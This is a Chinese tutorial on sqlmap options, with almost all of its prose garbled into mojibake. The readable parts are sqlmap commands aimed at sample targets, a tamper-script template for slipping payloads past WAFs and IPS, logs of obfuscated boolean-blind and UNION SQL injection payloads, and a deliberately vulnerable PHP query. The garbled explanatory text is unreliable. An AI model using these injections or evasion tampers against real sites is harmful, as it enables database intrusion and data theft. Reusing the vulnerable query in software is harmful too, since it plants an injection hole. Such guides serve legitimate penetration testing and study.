鏈夋椂鏈嶅姟鍣ㄦ娴嬪埌鏌愪釜瀹㈡埛绔敊璇姹傝繃澶氫細瀵瑰叾杩涜灞忚斀锛岃€孲qlmap鐨勬祴璇曞線寰€浼氫骇鐢熷ぇ閲忛敊璇姹傦紝涓洪伩鍏嶈灞忚斀锛屽彲浠ユ椂涓嶆椂鐨勪骇鐢熷嚑涓甯歌姹備互杩锋儜鏈嶅姟鍣ㄣ€傛湁浠ヤ笅鍥涗釜鍙傛暟涓庤繖涓€鏈哄埗鏈夊叧锛?
- 鈥搒afe-url: 闅斾竴浼氬氨璁块棶涓€涓嬬殑瀹夊叏URL
- 鈥搒afe-post: 璁块棶瀹夊叏URL鏃舵惡甯︾殑POST鏁版嵁
- 鈥搒afe-req: 浠庢枃浠朵腑杞藉叆瀹夊叏HTTP璇锋眰
- 鈥搒afe-freq: 姣忔娴嬭瘯璇锋眰涔嬪悗閮戒細璁块棶涓€涓嬬殑瀹夊叏URL
杩欓噷鎵€璋撶殑瀹夊叏URL鏄寚璁块棶浼氳繑鍥?00銆佹病鏈変换浣曟姤閿欑殑URL銆傜浉搴斿湴锛孲qlmap涔熶笉浼氬瀹夊叏URL杩涜浠讳綍娉ㄥ叆娴嬭瘯銆?
20.鍏抽棴URL缂栫爜
鍙傛暟锛氣€搒kip-urlencode
Sqlmap榛樿浼氬URL杩涜URL缂栫爜锛屽彲浠ヤ娇鐢ㄨ鍙傛暟鍏抽棴URL缂栫爜銆?
21.缁曡繃CSRF淇濇姢
鍙傛暟锛氣€揷srf-token鍜屸€揷srf-url
鐜板湪鏈夊緢澶氱綉绔欓€氳繃鍦ㄨ〃鍗曚腑娣诲姞鍊间负闅忔満鐢熸垚鐨則oken鐨勯殣钘忓瓧娈垫潵闃叉CSRF鏀诲嚮锛孲qlmap浼氳嚜鍔ㄨ瘑鍒嚭杩欑淇濇姢鏂瑰紡骞剁粫杩囥€備絾鑷姩璇嗗埆鏈夊彲鑳藉け鏁堬紝姝ゆ椂灏辫鐢ㄥ埌杩欎袱涓弬鏁般€?
鈥溾€揷srf-token鈥濈敤浜庢寚瀹氬寘鍚玹oken鐨勯殣钘忓瓧娈靛悕锛岃嫢杩欎釜瀛楁鍚嶄笉鏄父瑙佺殑闃叉CSRF鏀诲嚮鐨勫瓧娈靛悕Sqlmap鍙兘涓嶈兘鑷姩璇嗗埆鍑猴紝闇€瑕佹墜鍔ㄦ寚瀹氥€傚Django涓瀛楁鍚嶄负鈥渃srfmiddlewaretoken鈥濓紝鏄庢樉涓嶤SRF鏀诲嚮鏈夊叧銆?
鈥溾€揷srf-url鈥濈敤浜庝粠浠绘剰鐨刄RL涓洖鏀秚oken鍊笺€傝嫢鏈€鍒濇湁婕忔礊鐨勭洰鏍嘦RL涓病鏈夊寘鍚玹oken鍊艰€屽張瑕佹眰鍦ㄥ叾浠栧湴鍧€鎻愬彇token鍊兼椂璇ュ弬鏁板氨寰堟湁鐢ㄣ€?
22.寮哄埗浣跨敤SSL
鍙傛暟锛氣€揻orce-ssl
23.鍦ㄦ瘡娆¤姹傚墠鎵ц鐗瑰畾Python浠g爜
鍙傛暟锛氣€揺val
鐩存帴鐪嬩緥瀛愶細
python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"
鍏€佷紭鍖?/h3>
杩欎簺鍙傛暟鍙互浼樺寲Sqlmap鐨勬€ц兘銆?
1.涓€閿紭鍖?
鍙傛暟锛?o
娣诲姞姝ゅ弬鏁扮浉褰撲簬鍚屾椂娣诲姞涓嬪垪涓変釜浼樺寲鍙傛暟锛?
- 鈥搆eep-alive
- 鈥搉ull-connection
- 鈥搕hreads=3 锛堝鏋滄病鏈夎缃竴涓洿濂界殑鍊硷級
杩欎簺鍙傛暟鍏蜂綋鍚箟瑙佸悗鏂囥€?
2.HTTP闀胯繛鎺?
鍙傛暟锛氣€搆eep-alive
璇ュ弬鏁拌Sqlmap浣跨敤HTTP闀胯繛鎺ャ€傝鍙傛暟涓庘€溾€損roxy鈥濈煕鐩俱€?
3.HTTP绌鸿繛鎺?
鍙傛暟锛氣€搉ull-connection
鏈変竴绉嶇壒娈婄殑HTTP璇锋眰绫诲瀷鍙互鐩存帴鑾峰緱HTTP鍝嶅簲鐨勫ぇ灏忚€屼笉鐢ㄨ幏寰桯TTP鍝嶅簲浣撱€傛樉鐒惰繖鍦ㄥ竷灏斿瀷鐩叉敞涓彲浠ヨ妭绾﹀緢澶х殑甯﹀銆傚綋鐒惰繖涓€鎶€鏈槸闇€瑕佹湇鍔″櫒绔敮鎸佺殑銆傝鍙傛暟涓庘€溾€搕ext-only鈥濈煕鐩俱€?
4.HTTP骞跺彂
鍙傛暟锛氣€搕hreads
浣跨敤璇ュ弬鏁版寚瀹歋qlmap鍙互杈惧埌鐨勬渶澶у苟鍙戞暟銆備粠鎬ц兘鍜岀綉绔欐壙鍙楄兘鍔涗袱鏂归潰鑰冭檻鏈€澶у苟鍙戞暟涓嶈瓒呰繃10銆?
涓冦€佹敞鍏?/h3>
杩欎簺鍙傛暟琚敤浜庢寚瀹氳娴嬭瘯鐨勫弬鏁般€佸畾鍒舵敾鍑昏嵎杞藉拰閫夋嫨绡℃敼鑴氭湰銆?
1.瑕佹祴璇曠殑娉ㄥ叆鐐?
鍙傛暟锛?p鍜屸€搒kip
榛樿鎯呭喌涓婼qlmap浼氭祴璇曟墍鏈塆ET鍙傛暟鍜孭OST鍙傛暟锛屽綋level澶т簬绛変簬2鏃朵細娴嬭瘯cookie鍙傛暟锛屽綋level澶т簬绛変簬3鏃朵細娴嬭瘯User-Agent鍜孯eferer銆傚疄闄呬笂杩樺彲浠ユ墜鍔ㄦ寚瀹氫竴涓互閫楀彿鍒嗛殧鐨勩€佽娴嬭瘯鐨勫弬鏁板垪琛紝璇ュ垪琛ㄤ腑鐨勫弬鏁颁笉鍙條evel闄愬埗銆傝繖灏辨槸鈥?p鈥濈殑浣滅敤銆?
涓句釜渚嬪瓙锛岃嫢鎯冲彧娴嬭瘯GET鍙傛暟鈥渋d鈥濆拰User-Agent锛屽垯鍙互杩欎箞鍐欙細
-p "id,user-agent"
--level=5 --skip="user-agent,referer"
/user.php?id=1
/user/1/
python sqlmap.py -u "http(s)://target.cc/user/1*/"
2.鎸囧畾鏁版嵁搴撶鐞嗙郴缁?
鍙傛暟锛氣€揹bms
dbms鏄€淒atabase Management System鈥濈殑缂╁啓銆傞粯璁ゆ儏鍐典笅Sqlmap浼氳嚜鍔ㄦ娴嬬綉绔欎娇鐢ㄧ殑鏁版嵁搴撶鐞嗙郴缁燂紝Sqlmap鏀寔浠ヤ笅杩欎簺鏁版嵁搴撶鐞嗙郴缁燂細
- MySQL
- Oracle
- PostgreSQL
- Microsoft SQL Server
- Microsoft Access
- Firebird
- SQLite
- Sybase
- SAP MaxDB
- DB2
濡傛灉Sqlmap鑷姩妫€娴嬪け璐ユ垨鏄笉鎯宠Sqlmap杩涜鏁版嵁搴撴寚绾规娴嬶紝鍙互浣跨敤鍙傛暟鈥溾€揹bms鈥濇墜鍔ㄦ寚瀹氭暟鎹簱绠$悊绯荤粺锛屽锛氣€溾€揹bms postgresql鈥濄€?
瀵逛簬Mysql鍜孧icrosoft SQL Server鍜岃杩欐牱鎸囧畾锛?
--dbms MySQL <version>
--dbms Microsoft SQL Server <version>
瀵逛簬MySQL鏉ヨ锛屾槸绫讳技杩欐牱鐨勶細5.0銆傚浜嶮icrosoft SQL Server鏉ヨ锛屾槸绫讳技杩欐牱鐨勶細2005銆?
濡傛灉鍦ㄦ坊鍔犫€溾€揹bms鈥濆弬鏁扮殑鍚屾椂杩樻坊鍔犱簡鈥溾€揻ingerprint鈥濓紝Sqlmap鍙細鍦ㄦ寚瀹氱殑鏁版嵁搴撶鐞嗙郴缁熷唴杩涜鎸囩汗璇嗗埆銆?
鍙湁鍦ㄥ緢纭畾鏃朵娇鐢ㄢ€溾€揹bms鈥濓紝鍚﹀垯杩樻槸璁㏒qlmap鑷姩妫€娴嬫洿濂戒簺銆?
3.鎸囧畾杩愯鏁版嵁搴撶鐞嗙郴缁熺殑鎿嶄綔绯荤粺
鍙傛暟锛氣€搊s
榛樿鎯呭喌涓婼qlmap浼氳嚜鍔ㄦ娴嬭繍琛屾暟鎹簱绠$悊绯荤粺鐨勬搷浣滅郴缁燂紝鐩墠瀹屽叏鏀寔鐨勬搷浣滅郴缁熸湁锛?
- Linux
- Windows
濡傛灉寰堢‘瀹氬彲浠ヤ娇鐢ㄥ弬鏁扳€溾€搊s鈥濇寚瀹氳繍琛屾暟鎹簱绠$悊绯荤粺鐨勬搷浣滅郴缁熴€傚綋鐒跺湪鍙敤寰堢‘瀹氭椂鎵嶅簲璇ヤ娇鐢ㄦ鍙傛暟锛屽惁鍒欒繕鏄Sqlmap鑷姩妫€娴嬫洿濂戒簺銆?
4.鐢熸垚鏃犳晥鍙傛暟鍊兼椂寮哄埗浣跨敤澶ф暟
鍙傛暟锛氣€搃nvalid-bignum
鏈夋椂鍦ㄦ敞鍏ユ祴璇曟椂闇€瑕佺敓鎴愭棤鏁堝弬鏁帮紝涓€鑸儏鍐典笅Sqlmap浼氬彇宸叉湁鍙傛暟锛堝锛歩d=13锛夌殑鐩稿弽鏁帮紙濡傦細id=-13锛変綔涓烘棤鏁堝弬鏁般€備絾鑻ユ坊鍔犫€溾€搃nvalid-bignum鈥濓紝Sqlmap灏变細鍙栧ぇ鏁帮紙濡傦細id=99999999锛変綔涓烘棤鏁堝弬鏁般€?
5.鐢熸垚鏃犳晥鍙傛暟鍊兼椂寮哄埗浣跨敤閫昏緫鎿嶄綔绗?
鍙傛暟锛氣€搃nvalid-logical
鏈夋椂鍦ㄦ敞鍏ユ祴璇曟椂闇€瑕佺敓鎴愭棤鏁堝弬鏁帮紝涓€鑸儏鍐典笅Sqlmap浼氬彇宸叉湁鍙傛暟锛堝锛歩d=13锛夌殑鐩稿弽鏁帮紙濡傦細id=-13锛変綔涓烘棤鏁堝弬鏁般€備絾鑻ユ坊鍔犫€溾€搃nvalid-logical鈥濓紝Sqlmap灏变細浣跨敤閫昏緫鎿嶄綔绗︼紙濡傦細id=13 AND 18=19锛変綔涓烘棤鏁堝弬鏁般€?
6.鐢熸垚鏃犳晥鍙傛暟鍊兼椂寮哄埗浣跨敤瀛楃涓?
鍙傛暟锛氣€搃nvalid-string
鏈夋椂鍦ㄦ敞鍏ユ祴璇曟椂闇€瑕佺敓鎴愭棤鏁堝弬鏁帮紝涓€鑸儏鍐典笅Sqlmap浼氬彇宸叉湁鍙傛暟锛堝锛歩d=13锛夌殑鐩稿弽鏁帮紙濡傦細id=-13锛変綔涓烘棤鏁堝弬鏁般€備絾鑻ユ坊鍔犫€溾€搃nvalid-logical鈥濓紝Sqlmap灏变細浣跨敤瀛楃涓诧紙濡傦細id=akewmc锛変綔涓烘棤鏁堝弬鏁般€?
7.鍏抽棴payload杞崲
鍙傛暟锛氣€搉o-cast
鍦ㄦ绱㈢粨鏋滄椂Sqlmap浼氬皢鎵€鏈夎緭鍏ヨ浆鎹负瀛楃涓茬被鍨嬶紝鑻ラ亣鍒扮┖鍊硷紙NULL锛夊垯灏嗗叾鏇挎崲涓虹┖鐧藉瓧绗︺€? 杩欐牱鍋氭槸涓轰簡闃叉濡傝繛鎺ョ┖鍊煎拰瀛楃涓蹭箣绫荤殑浠讳綍閿欒鍙戠敓骞跺彲浠ョ畝鍖栨暟鎹绱㈣繃绋嬨€? 浣嗘槸鏈夋姤鍛婃樉绀哄湪鑰佺増鏈殑Mysql涓繖鏍峰仛浼氬鑷存暟鎹绱㈠嚭鐜伴棶棰橈紝鍥犳娣诲姞浜嗏€溾€搉o-cast鈥濇潵鍛婅瘔Sqlmap涓嶈杩欐牱鍋氥€?
8.鍏抽棴瀛楃涓茬紪鐮?
鍙傛暟锛氣€搉o-escape
鏈夋椂Sqlmap浼氫娇鐢ㄧ敤鍗曞紩鍙锋嫭璧锋潵鐨勫瓧绗︿覆鍊间綔涓簆ayload锛屽鈥淪ELECT 鈥榝oobar鈥欌€濓紝榛樿鍦拌繖浜涘€间細琚紪鐮侊紝濡備笂渚嬪皢琚紪鐮佷负锛? 鈥淪ELECT CHAR(102)+CHAR(111)+CHAR(111)+CHAR(98)+CHAR(97)+CHAR(114))鈥濄€傝繖鏍峰仛鏃㈠彲浠ユ贩娣嗚鍚浜轰竴鏃堕毦浠ユ礊瀵焢ayload鐨勫唴瀹瑰張鍙互鍦ㄥ悗鍙版湇鍔″櫒浣跨敤绫讳技magic_quote鎴杕ysql_real_escape_string杩欐牱鐨勮浆涔夊嚱鏁扮殑鎯呭喌涓嬪瓧绗︿覆涓嶅彈褰卞搷銆傚綋鐒跺湪鏌愪簺鎯呭喌涓嬮渶瑕佸叧闂瓧绗︿覆缂栫爜锛屽涓轰簡缂╁噺payload闀垮害锛岀敤鎴峰彲浠ヤ娇鐢ㄢ€溾€搉o-escape鈥濇潵鍏抽棴瀛楃涓茬紪鐮併€?
9.瀹氬埗payload
鍙傛暟锛氣€損refix鍜屸€搒uffix
鏈夋椂鍙湁鍦╬ayload鍚庢坊鍔犵敤鎴锋寚瀹氱殑鍚庣紑鎵嶈兘娉ㄥ叆鎴愬姛銆傚彟涓€绉嶅満鏅槸鐢ㄦ埛宸茬粡鐭ラ亾鏌ヨ璇彞鎬庝箞鍐欑殑锛屾鏃跺彲浠ョ洿鎺ユ寚瀹歱ayload鐨勫墠缂€鍜屽悗缂€鏉ュ畬鎴愭娴嬪拰娉ㄥ叆銆?
涓€涓湁婕忔礊鐨勬簮鐮佺ず渚嬪涓嬶細
query = "SELECT * FROM users WHERE id=('" . $\_GET['id'] . "') LIMIT 0, 1";
python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1
杩欎釜鍙ュ瓙璇硶鏄纭殑锛宲ayloa涔熻兘鎵ц銆?
鍦ㄧ畝鍗曠殑娴嬭瘯鐜涓婼qlmap涓嶉渶瑕佽鎻愪緵瀹氬埗鐨勮竟鐣岃寖鍥村氨鑳藉鑷姩妫€娴嬪苟瀹屾垚娉ㄥ叆锛屼絾鍦ㄧ湡瀹炰笘鐣屼腑鏌愪簺搴旂敤鍙兘浼氬緢澶嶆潅濡傚祵濂桱OIN鏌ヨ锛屾鏃跺氨闇€瑕佷负Sqlmap鎸囨槑杈圭晫鑼冨洿銆?
10.淇敼娉ㄥ叆鏁版嵁
鍙傛暟锛氣€搕amper
闄や簡鐢–HAR()缂栫爜瀛楃涓插Sqlmap娌℃湁瀵筽ayload杩涜浠讳綍娣锋穯銆? 璇ュ弬鏁扮敤浜庡payload杩涜娣锋穯浠ョ粫杩嘔PS鎴朩AF銆? 璇ュ弬鏁板悗璺熶竴涓猼amper鑴氭湰鐨勫悕瀛椼€? 鑻ヨtamper鑴氭湰浣嶄簬sqlmap鐨勫畨瑁呯洰褰曠殑tamper/鐩綍涓紝灏卞彲浠ョ渷鐣ヨ矾寰勫拰鍚庣紑鍚嶏紝鍙啓鏂囦欢鍚嶃€? 澶氫釜tamper鑴氭湰涔嬮棿鐢ㄧ┖鏍奸殧寮€銆?
鍦╰amper/鐩綍涓湁璁稿鍙敤鐨則amper鑴氭湰銆倀amper鑴氭湰鐨勪綔鐢ㄦ槸瀵筽ayload杩涜娣锋穯銆? 鎴戜滑杩樺彲浠ヨ嚜宸卞啓tamper鑴氭湰锛岃繖灞炰簬Sqlmap鐨勯珮绾х敤娉曪紝涓€涓湁鏁堢殑tamper鑴氭湰濡備笅鎵€绀猴細
# 蹇呴』瑕佸鍏ョ殑搴? from lib.core.enums import PRIORITY
# 瀹氫箟璇amper鑴氭湰鐨勪紭鍏堢骇
__priority__ = PRIORITY.NORMAL
def tamper(payload):
'''姝ゅ鏄痶amper鐨勮鏄?''
retVal = payload
# 姝ゅ鏄敤浜庝慨鏀筽ayload鐨勪唬鐮? # 杩斿洖淇敼鍚庣殑payload
return retVal
python sqlmap.py -u "http://192.168.56.101:8080/ScorePrj/?id=1" \
--tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
[12:55:52] [DEBUG] cleaning up configuration parameters
[12:55:52] [INFO] loading tamper script 'between'
[12:55:52] [INFO] loading tamper script 'randomcase'
[12:55:52] [INFO] loading tamper script 'space2comment'
[...]
[12:55:53] [INFO] testing for SQL injection on GET parameter 'id'
[12:55:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:55:53] [PAYLOAD] 1
[12:55:53] [PAYLOAD] 1)/**/aNd/**/8083=4737/**/aNd/**/(4754/**/BetwEen/**/4754/**/aNd/**/4754
[12:55:53] [PAYLOAD] 1)/**/anD/**/4962=4962/**/anD/**/(2361/**/BeTweEN/**/2361/**/anD/**/2361
[12:55:53] [PAYLOAD] 1/**/aNd/**/9754/**/BETwEEn/**/1206/**/aNd/**/1206
[12:55:53] [PAYLOAD] 1/**/AnD/**/4962/**/beTweEn/**/4962/**/AnD/**/4962
[12:55:53] [PAYLOAD] 1/**/aND/**/2741/**/BetWeEn/**/9323/**/aND/**/9323--/**/Ihsa
[12:55:53] [PAYLOAD] 1/**/anD/**/4962/**/BetweEN/**/4962/**/anD/**/4962--/**/wVUI
[12:55:53] [PAYLOAD] 1')/**/anD/**/1694=6061/**/anD/**/('zLwu'='zLwu
[12:55:53] [PAYLOAD] 1')/**/ANd/**/4962=4962/**/ANd/**/('Dsfw'='Dsfw
[12:55:53] [PAYLOAD] 1'/**/aND/**/6307=8901/**/aND/**/'fKLn'='fKLn
[12:55:53] [PAYLOAD] 1'/**/aNd/**/4962=4962/**/aNd/**/'YFsp'='YFsp
[12:55:53] [PAYLOAD] 1%'/**/anD/**/3549=6854/**/anD/**/'%'='
[12:55:53] [PAYLOAD] 1%'/**/aND/**/4962=4962/**/aND/**/'%'='
[...]
[12:55:54] [PAYLOAD] 1)/**/uNIoN/**/alL/**/Select/**/nuLl--/**/NRtq
[12:55:54] [PAYLOAD] 1)/**/UnIOn/**/alL/**/sElEcT/**/nuLL,nuLL--/**/jalk
[12:55:54] [PAYLOAD] 1)/**/Union/**/aLl/**/seLeCt/**/nuLL,nuLL,nuLL--/**/ylpg
[...]
[...]
[13:00:12] [INFO] testing for SQL injection on GET parameter 'id'
[13:00:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:00:12] [PAYLOAD] 1) AND 9902=5632 AND (5820=5820
[13:00:12] [PAYLOAD] 1) AND 6711=6711 AND (7174=7174
[13:00:12] [PAYLOAD] 1 AND 7140=6136
[13:00:12] [PAYLOAD] 1 AND 6711=6711
[13:00:12] [PAYLOAD] 1 AND 1693=7532-- oqcR
[13:00:12] [PAYLOAD] 1 AND 6711=6711-- qAPJ
[13:00:12] [PAYLOAD] 1') AND 6904=7395 AND ('xBlu'='xBlu
[13:00:12] [PAYLOAD] 1') AND 6711=6711 AND ('RgoX'='RgoX
[13:00:12] [PAYLOAD] 1' AND 6469=7302 AND 'maCj'='maCj
[13:00:12] [PAYLOAD] 1' AND 6711=6711 AND 'pSYg'='pSYg
[13:00:12] [PAYLOAD] 1%' AND 7516=3605 AND '%'='
[13:00:12] [PAYLOAD] 1%' AND 6711=6711 AND '%'='
[...]
[13:00:12] [PAYLOAD] 1) UNION ALL SELECT NULL-- mUDh
[13:00:12] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL-- QKId
[13:00:12] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL-- iwvT
[...]
鍏€佹娴?/h3>
1.妫€娴嬬骇鍒?
鍙傛暟锛氣€搇evel
姝ゅ弬鏁扮敤浜庢寚瀹氭娴嬬骇鍒紝鏈?~5鍏?绾с€傞粯璁や负1锛岃〃绀哄仛鏈€灏戠殑妫€娴嬶紝鐩稿簲鐨勶紝5绾ц〃绀哄仛鏈€澶氱殑妫€娴嬨€? Sqlmap浣跨敤鐨刾ayload淇濆瓨鍦ㄧ洰褰晉ml/payloads/涓紝鏄痻ml鏍煎紡鐨勶紝鍙互鑷繁瀹氬埗銆傝妭閫変竴涓猵ayload濡備笅鎵€绀猴細
<test>
<title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
<stype>1</stype>
<level>2</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
鍦ㄤ笂渚嬩腑鍙互鐪嬪埌鏈塴evel鏍囩锛屽叾鍊间负2锛岃payload鍦ㄦ娴嬬骇鍒ぇ浜庣瓑浜?鏃惰浣跨敤銆? risk鏍囩鐨勫惈涔夎鍚庢枃銆?
妫€娴嬬骇鍒笉浠呬細褰卞搷payload鐨勪娇鐢紝杩樹細褰卞搷娉ㄥ叆鐐圭殑妫€娴嬶紝GET鍜孭OST鍙傛暟鏄竴鐩翠細琚娴嬬殑锛? 妫€娴嬬骇鍒ぇ浜庣瓑浜?鏃朵細妫€娴媍ookie鏄惁鏈夋敞鍏ワ紝妫€娴嬬骇鍒ぇ浜庣瓑浜?鏃朵細妫€娴婾ser-Agent鍜孯eferer鏄惁鏈夋敞鍏ャ€?
鑻ヤ笉鏄緢娓呮娉ㄥ叆鐐瑰湪鍝噷鍙互璁剧疆涓€涓瘮杈冮珮鐨勬娴嬬骇鍒€?
寮虹儓寤鸿鍦ㄥ悜Sqlmap瀹樻柟鎶ュ憡涓€涓槑纭瓨鍦ㄧ殑娉ㄥ叆婕忔礊妫€娴嬩笉鍑烘潵鍓嶅厛鎶婃娴嬬骇鍒皟楂樿瘯璇曘€?
2.椋庨櫓绛夌骇
鍙傛暟锛氣€搑isk
姝ゅ弬鏁扮敤浜庢寚瀹氶闄╃瓑绾э紝鏈?~4鍏?绾с€傞粯璁ら闄╃瓑绾т负1锛屾绛夌骇鍦ㄥぇ澶氭暟鎯呭喌涓嬪娴嬭瘯鐩爣鏃犲銆? 椋庨櫓绛夌骇2娣诲姞浜嗗熀浜庢椂闂寸殑娉ㄥ叆娴嬭瘯锛岀瓑绾?娣诲姞浜哋R娴嬭瘯銆?
鑻ユ敞鍏ョ偣鏄湪UPDATE璇彞涓紝浣跨敤OR娴嬭瘯鍙兘浼氫慨鏀规暣涓〃鐨勬暟鎹紝杩欐樉鐒朵笉鏄敾鍑昏€呮兂瑕佺湅鍒扮殑銆? 鍥犳鐢ㄦ埛闇€瑕佽兘鎺у埗椋庨櫓绛夌骇閬垮紑鏈夋綔鍦ㄩ闄╃殑payload銆?
3.椤甸潰瀵规瘮
鍙傛暟锛氣€搒tring銆佲€搉ot-string銆佲€搑egexp
榛樿鎯呭喌涓嬪湪甯冨皵鍨嬫敞鍏ヤ腑Sqlmap閫氳繃姣旇緝杩斿洖椤甸潰鍐呭鏉ュ垽鏂璗rue鎴朏alse銆? 浣嗘湁鏃堕〉闈㈡瘡娆″埛鏂伴兘浼氫笉鍚岋紝濡傞〉闈腑鏈夊姩鎬佸箍鍛娿€係qlmap浼氬敖鍔涘垽鏂嚭椤甸潰涓姩鎬佺殑閮ㄥ垎鏉ワ紝浣嗗苟涓嶆€昏兘鎴愬姛銆? 鐢ㄦ埛鍙互鐢ㄥ弬鏁扳€溾€搒tring鈥濇寚鍑轰唬琛═rue鐨勯〉闈細鍖呭惈鑰屼唬琛‵alse鐨勯〉闈笉浼氬寘鍚殑瀛楃涓蹭互渚汼qlmap鍒ゆ柇True鎴朏alse锛? 鑻ヨ繖鏍风殑瀛楃涓叉槸鍙樺姩鐨勮繕鍙互鐢ㄥ弬鏁扳€溾€搑egexp鈥濇寚瀹氫竴涓鍒欒〃杈惧紡鍘诲尮閰嶈繖鏍风殑瀛楃涓层€? 鎴栬€呯敤鍙傛暟鈥溾€搉ot-string鈥濇寚鍑轰唬琛‵alse鐨勯〉闈細鍖呭惈鑰屼唬琛═rue鐨勯〉闈笉浼氬寘鍚殑瀛楃涓层€?
鍙傛暟锛氣€揷ode
鎴栬€呮洿绠€鍗曞湴锛岃嫢鏄敤鎴风煡閬撲唬琛═rue鐨勯〉闈TTP鐘舵€佺爜涓?00鑰屼唬琛‵alse鐨勯〉闈TTP鐘舵€佺爜涓嶄负200姣斿鏄?01锛? 鍙互鐢ㄢ€溾€揷ode鈥濆弬鏁板憡璇夊憡璇塖qlmap杩欎竴淇℃伅锛屽鈥溾€揷ode=200鈥濄€?
鍙傛暟锛氣€搕itles
鑻ユ槸鐢ㄦ埛鐭ラ亾浠h〃True鐨勯〉闈itle鍜屼唬琛‵alse鐨勯〉闈itle涓嶅悓锛? 濡備唬琛═rue鐨勯〉闈itle涓衡€淲elcome鈥濓紝浠h〃False鐨勯〉闈itle涓衡€淔orbidden鈥濓紝
灏卞彲浠ヤ娇鐢ㄥ弬鏁扳€溾€搕itles鈥濊Sqlmap渚濇嵁title鏉ュ垽鏂璗rue鎴朏alse銆?
鍙傛暟锛氣€搕ext-only
鑻ユ槸HTTP鍝嶅簲浣撲腑鏈夎澶氳濡侸avaScript涔嬬被鐨勬椿鍔ㄥ唴瀹癸紝鍙互浣跨敤鍙傛暟鈥溾€搕ext-only鈥濊Sqlmap鍙笓娉ㄤ簬绾枃鏈唴瀹广€?
涔濄€佹敞鍏ユ妧鏈?/h3>
杩欎簺鍙傛暟鐢ㄤ簬瀵圭壒瀹氱殑SQL娉ㄥ叆鎶€鏈繘琛岃皟鏁淬€?
1.妫€娴嬫椂鎵€鐢ㄦ妧鏈?
鍙傛暟锛氣€搕echnique
姝ゅ弬鏁扮敤浜庢寚瀹氭娴嬫敞鍏ユ椂鎵€鐢ㄦ妧鏈€傞粯璁ゆ儏鍐典笅Sqlmap浼氫娇鐢ㄨ嚜宸辨敮鎸佺殑鍏ㄩ儴鎶€鏈繘琛屾娴嬨€? 姝ゅ弬鏁板悗璺熻〃绀烘娴嬫妧鏈殑澶у啓瀛楁瘝锛屽叾鍊间负B銆丒銆乁銆丼銆乀鎴朡锛屽惈涔夊涓嬶細
- B锛欱oolean-based blind锛堝竷灏斿瀷娉ㄥ叆锛?/li>
- E锛欵rror-based锛堟姤閿欏瀷娉ㄥ叆锛?/li>
- U锛歎nion query-based锛堝彲鑱斿悎鏌ヨ娉ㄥ叆锛?/li>
- S锛歋tacked queries锛堝彲澶氳鍙ユ煡璇㈡敞鍏ワ級
- T锛歍ime-based blind锛堝熀浜庢椂闂村欢杩熸敞鍏ワ級
- Q锛欼nline queries锛堝祵濂楁煡璇㈡敞鍏ワ級
鍙互鐢ㄢ€溾€搕echnique ES鈥濇潵鎸囧畾浣跨敤涓ょ妫€娴嬫妧鏈€傗€溾€搕echnique BEUSTQ鈥濅笌榛樿鎯呭喌绛夋晥銆?
鎯宠璁块棶鏂囦欢绯荤粺鎴栨槸Windows鐨勬敞鍐岃〃灏变竴瀹氳娣诲姞鈥淪鈥濊繘琛屽璇彞鏌ヨ娉ㄥ叆娴嬭瘯銆?
2.鍩轰簬鏃堕棿寤惰繜娉ㄥ叆涓欢鏃惰缃?
鍙傛暟锛氣€搕ime-sec
鐢ㄦ鍙傛暟璁剧疆鍩轰簬鏃堕棿寤惰繜娉ㄥ叆涓欢鏃舵椂闀匡紝榛樿涓?绉掋€?
3.鑱斿悎鏌ヨ娉ㄥ叆涓垪鏁拌缃?
鍙傛暟锛氣€搖nion-cols
鍦ㄨ繘琛岃仈鍚堟煡璇㈡敞鍏ユ椂锛孲qlmap浼氳嚜鍔ㄦ娴嬪垪鏁帮紝鑼冨洿鏄?鍒?0銆傚綋level鍊艰緝楂樻椂鍒楁暟妫€娴嬭寖鍥寸殑涓婇檺浼氭墿澶у埌50銆?
鍙互鐢ㄦ鍙傛暟鎸囧畾鍒楁暟妫€娴嬭寖鍥达紝濡傗€溾€搖nion-cols 12-16鈥濆氨浼氳Sqlmap鐨勫垪鏁版娴嬭寖鍥村彉鎴?2鍒?6銆?
4.鑱斿悎鏌ヨ娉ㄥ叆涓瓧绗﹁缃?
鍙傛暟锛氣€搖nion-char
榛樿鎯呭喌涓婼qlmap杩涜鑱斿悎鏌ヨ娉ㄥ叆鏃朵娇鐢ㄧ┖瀛楃锛圢ULL锛夈€備絾褰搇evel鍊艰緝楂樻椂Sqlmap浼氱敓鎴愰殢鏈烘暟鐢ㄤ簬鑱斿悎鏌ヨ娉ㄥ叆銆? 鍥犱负鏈夋椂浣跨敤绌哄瓧绗︽敞鍏ヤ細澶辫触鑰屼娇鐢ㄩ殢鏈烘暟浼氭垚鍔熴€?
浣跨敤姝ゅ弬鏁板彲浠ユ寚瀹氳仈鍚堟煡璇㈡敞鍏ヤ腑浣跨敤鐨勫瓧绗︼紝濡傦細鈥溾€搖nion-char 123鈥濄€?
鈥滆仈鍚堟煡璇㈡敞鍏ヤ腑浣跨敤鐨勫瓧绗︹€濈┒绔熸槸浠€涔堟剰鎬濆憿锛熻鐪嬩笅闈袱涓緥瀛愶細
绗竴涓緥瀛愶紝涓嶄娇鐢ㄢ€溾€搖nion-char鈥濓紝榛樿鎯呭喌涓嬭仈鍚堟煡璇㈡敞鍏ヤ腑浣跨敤鐨勫瓧绗︿负绌哄瓧绗︼紙NULL锛夛細
python sqlmap.py -u "http://192.168.56.101/user.php?id=001" --technique U -v 3
